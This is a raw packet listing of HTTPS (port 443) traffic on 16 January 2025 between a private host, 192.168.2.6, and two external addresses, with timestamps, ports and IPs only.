Jan 16, 2025 13:35:09.981908083 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.981982946 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.981996059 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.035170078 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.058738947 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.058763027 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.058830023 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.058870077 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.060089111 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.060174942 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.060192108 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.060390949 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.060455084 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.060470104 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.061986923 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.062064886 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.062077999 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.063546896 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.063610077 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.063625097 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.066745043 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.066777945 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.066817045 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.066833019 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.066862106 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.113173008 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.145427942 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.145447969 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.145477057 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.145487070 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.145519018 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.145540953 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.145570040 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.145586014 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.145749092 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.145777941 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.145809889 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.145823002 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.145845890 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.145865917 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.151278973 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.151348114 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.151376963 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.151388884 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.151416063 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.151433945 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.165093899 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.165128946 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.165249109 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.165271044 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.165317059 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.172373056 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.172403097 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.172499895 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.172513962 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.172559977 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.177360058 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.177458048 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.177467108 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.182336092 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.182461977 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.182495117 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.185729027 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.185827017 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.185836077 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.190869093 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.190954924 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.190962076 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.195827007 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.195946932 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.195966005 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.200843096 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.200911999 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.200927973 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.204205036 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.204286098 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.204294920 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:10.204345942 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.418621063 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:10.972778082 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:10.972819090 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:10.972893953 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:10.973222017 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:10.973231077 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.247801065 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.248049974 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.248630047 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.248779058 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.250586033 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.250593901 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.250897884 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.257786036 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.303328991 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.658937931 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.658977985 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.659126997 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.659138918 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.663881063 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.663959026 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.663968086 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.706980944 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.742697001 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.742712021 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.742949963 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.742971897 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.744172096 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.744234085 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.744242907 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.749234915 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.749265909 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.749278069 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.749300957 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.749315023 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.749335051 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.800669909 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.829549074 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.829565048 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.829593897 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.829643011 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.829683065 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.829799891 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.829799891 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.829811096 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.829849958 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.832171917 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.832197905 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.832228899 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.832237959 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.832252026 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.832277060 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.832591057 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.832648039 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.832654953 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.834080935 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.834127903 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.834135056 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.839040041 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.839072943 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.839126110 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.839133978 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.839168072 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.894414902 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.915982962 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.916017056 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.916064024 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.916069984 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.916112900 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.916300058 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.916325092 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.916357040 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.916362047 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.916390896 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.916409969 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.917720079 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.917742968 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.917794943 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.917802095 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.917848110 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.919336081 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.919361115 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.919398069 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.919403076 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.919447899 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.927817106 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.927839041 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.927875996 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.927881956 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.927927017 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.937742949 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.937767029 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.937819958 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.937828064 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.937865019 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.943473101 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.943536997 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.951108932 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.951132059 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.951174021 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.951185942 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.951214075 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.951242924 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.968488932 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.968512058 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.968554974 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:12.968569040 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:12.968607903 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.002835989 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.002909899 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.002958059 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.002969027 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.002984047 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.003041983 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.003047943 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.003065109 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.003110886 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.003117085 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.003161907 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.004057884 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.004122019 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.004127026 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.004550934 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.004575014 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.004607916 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.004615068 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.004646063 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.007854939 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.007879019 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.007926941 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.007935047 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.007971048 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.012778044 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.012851000 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.012856007 CET	443	49712	159.75.57.35	192.168.2.6
Jan 16, 2025 13:35:13.012914896 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.013313055 CET	49712	443	192.168.2.6	159.75.57.35
Jan 16, 2025 13:35:13.034018040 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:13.034054041 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:13.034132004 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:13.034565926 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:13.034578085 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.462969065 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.466845989 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:14.466881037 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.883219957 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.883254051 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.883290052 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.883327961 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:14.883344889 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.883357048 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:14.883387089 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:14.968491077 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.968517065 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.968631983 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:14.968650103 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.968693972 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:14.973047018 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.973071098 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.973134995 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:14.973149061 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:14.973176956 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:14.973191023 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.055838108 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.055866957 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.055928946 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.055946112 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.055979967 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.056006908 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.057813883 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.057836056 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.057912111 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.057919979 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.057960987 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.060705900 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.060728073 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.060795069 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.060803890 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.060863018 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.064136982 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.064158916 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.064198971 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.064208031 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.064251900 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.064269066 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.146444082 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.146524906 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.146542072 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.146560907 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.146631002 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.146631002 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.146646976 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.146675110 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.146683931 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.146698952 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.146703959 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.146733046 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.146756887 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.148252964 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.148276091 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.148315907 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.148327112 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.148356915 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.148428917 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.149821043 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.149843931 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.149887085 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.149895906 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.149925947 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.149936914 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.151515961 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.151537895 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.151608944 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.151619911 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.151631117 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.151798964 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.155344009 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.155427933 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.155440092 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.158746004 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.158837080 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.158847094 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.169202089 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.169230938 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.169275045 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.169286013 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.169321060 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.179656982 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.179677963 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.179745913 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.179764032 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.179790974 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.222556114 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.236737013 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.236761093 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.236804962 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.236819029 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.236849070 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.236872911 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.238712072 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.238759041 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.238785982 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.238795996 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.238840103 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.238840103 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.238877058 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.238938093 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.238945961 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.239062071 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.239109993 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.239116907 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.240236044 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.240262032 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.240297079 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.240304947 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.240338087 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.240679979 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.240700006 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.240751028 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.240761042 CET	443	49728	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:15.240773916 CET	49728	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:15.245805979 CET	443	49728	183.66.100.45	192.168.2.6
